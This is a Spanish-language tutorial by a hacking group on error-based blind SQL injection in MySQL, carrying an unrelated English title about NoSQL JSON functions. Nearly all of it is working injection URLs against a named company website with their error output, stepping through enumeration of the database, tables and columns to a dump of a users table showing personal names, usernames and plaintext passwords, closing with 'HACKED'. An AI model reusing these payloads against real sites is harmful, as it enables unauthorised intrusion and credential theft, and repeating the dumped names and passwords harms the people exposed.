Second Step to the NoSQL Side: MySQL JSON Functions
Error based blind sqli
1. MetalSoft #Team
[Rs4 – xDarkSton3x – FailRoot – Root-M - Trouk
¡Aviso!
El articulo mostrado a continuación, es propiedad de MetalSoft #Team , todo lo expuesto aquí
fue redactado por los usuarios del Team . El usuario lector es responsable del “USO” que le
de a la información expuesta en este mismo, MetalSoft #Team no se hace responsable.
2. MySQL (Error Based) Blind SQLi
En ocasiones nos encontramos con inyecciones en el que “ -1+unión+select+0” o el
“order by” no te saca el numero de columnas y no puedes realizar la inyección, pues te
aseguramos que lo primero que hacer es recurrir a una tool para que haga el trabajo.
Esto nos ha ocurrido en varias inyecciones por lo que nos hemos decidimos investigar
que otros métodos hay para este problema , con la búsqueda obtuvimos algunos
resultados pero ahora faltaba ponerlos en práctica para ver si en realidad funcionaba.
Para realizar la práctica utilizaremos
http://www.audiser.com.ar/producto.php?id=1
Buscando la Base de Datos:
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Y como resultado dará: ERROR: --> 1062 - Duplicate entry '~'audiser_audiser2011'~1' for key
'group_key'
Obteniendo el Usuario Actual:
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
resultado: ERROR: --> 1062 - Duplicate entry '~'audiser_admin@localhost'~1' for key 'group_key'
Sacando la Version
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
Resultado: ERROR: --> 1062 - Duplicate entry '~'5.1.58-community'~1' for key 'group_key'
3. Base de Datos actual
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
resultado: ERROR: --> 1062 - Duplicate entry '~'audiser_audiser2011'~1' for key 'group_key'
Usuario System
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(system_user() as char),0x27,0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
resultado: ERROR: --> 1062 - Duplicate entry '~'audiser_admin@localhost'~1' for key 'group_key'
Hostname
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(@@hostname as char),0x27,0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
resultado: ERROR: --> 1062 - Duplicate entry '~'capri.dattaweb.com'~1' for key 'group_key'
Directorio de Instalación
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(@@basedir as char),0x27,0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
resultado: ERROR: --> 1062 - Duplicate entry '~'/'~1' for key 'group_key'
4. DB User
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(GRANTEE as
char),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
resultado: ERROR: --> 1062 - Duplicate entry '~''audiser_admin'@'localhost''~1' for key
'group_key'
Encontrar bases de datos
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as
char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
N se incrementa.
Resultado: ERROR: --> 1062 - Duplicate entry '~'information_schema'~1' for key 'group_key'
Numero de tablas en la DB seleccionada
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e)
FROM `information_schema`.tables WHERE table_schema=0xDB _en_Hexa)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e)
FROM `information_schema`.tables WHERE
table_schema=0x617564697365725f6175646973657232303131)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
Resultado: ERROR: --> 1062 - Duplicate entry '~'13'~1' for key 'group_key'
5. Nombres de las tablas en la db
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as
char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0x617564697365725f6175646973657232303131 limit 12,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
Resultado: ERROR: --> 1062 - Duplicate entry '~'usuariosportal'~1' for key 'group_key'
Numero de columnas en la tabla
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns
WHERE table_schema=0x617564697365725f6175646973657232303131 AND
table_name=0x7573756172696f73706f7274616c)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Tabla y db en hexa.
Resultado: ERROR: --> 1062 - Duplicate entry '~'8'~1' for key 'group_key'
Columnas en la tabla
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as
char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0x617564697365725f6175646973657232303131 AND
table_name=0x7573756172696f73706f7274616c limit 6,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
el primer limit se incrementa de 1 en 1 para obtener las columnas.
Resultado: ERROR: --> 1062 - Duplicate entry '~'Password'~1' for key 'group_key'
6. Numero de datos
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM
`audiser_audiser2011`.usuarios)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Resultado: ERROR: --> 1062 - Duplicate entry '~'3'~1' for key 'group_key'
Extracción de datos
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select
count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(usuarios.user_pass as
char),0x27,0x7e) FROM `audiser_audiser2011`.usuarios LIMIT 2,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1
Resultado: ERROR: --> 1062 - Duplicate entry '~'1234'~1' for key 'group_key'
Finalmente podemos obtener los siguientes datos:
DB: 'audiser_audiser2011'
Tabla: usuarios
Columnas: user_id, user_nyap, user_pass , user_usua
Datos:
user_id | user_nyap | user_pass | user_usua |
5 | Audiser Argentina | 1234 | audiser11 |
2 | Juan Carlos Lange | 123 | juanca |
1 | Pablo Abadi | 2011 | pab_audi |
Procedemos a la búsqueda del Panel Administrativo y HACKED ..!
MetalSoft #Team